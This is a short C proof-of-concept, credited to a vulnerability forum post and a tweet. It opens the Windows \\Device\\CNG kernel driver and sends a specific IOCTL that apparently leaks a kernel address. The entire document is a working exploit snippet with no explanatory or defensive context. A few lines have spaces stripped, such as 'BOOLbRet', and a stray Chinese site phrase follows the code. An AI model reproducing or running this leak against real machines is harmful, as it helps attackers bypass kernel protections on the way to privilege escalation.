// Source: http://www.binvul.com/viewthread.php?tid=508 // Source: https://twitter.com/NTarakanov/status/598370525132423168 #include <windows.h> #include <winternl.h> #include <stdio.h> #pragmacomment(lib, "ntdll.lib") int main(int argc, CHAR* argv[]) { typedef NTSTATUS(__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions); NT_OPEN_FILE NtOpenFileStruct; PVOID Info; HMODULE hModule = LoadLibrary(("ntdll.dll")); NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile"); if(NtOpenFileStruct == NULL) { exit(-1); } UNICODE_STRING filename; RtlInitUnicodeString(&filename, L"\\Device\\CNG"); OBJECT_ATTRIBUTES obja; obja.Attributes=0x40; obja.ObjectName = &filename; obja.Length=0x18; obja.RootDirectory=NULL; obja.SecurityDescriptor=NULL; obja.SecurityQualityOfService=NULL; IO_STATUS_BLOCK iostatusblock; HANDLE hCNG = NULL; NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20); if(NT_SUCCESS(stat)) { printf("File successfully opened.\n"); } else { printf("File could not be opened.\n"); return -1; } DWORD dwBuffer = 0; DWORD dwCnt = 0; BOOLbRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL); if (FALSE == bRet) { printf("[*]Send IOCTL fail!\n"); printf("[*]Error Code:%d\n", GetLastError()); } else { printf("[*]0x%08x\n", dwBuffer); } CloseHandle(hCNG); getchar(); return 0; }
体验盒子
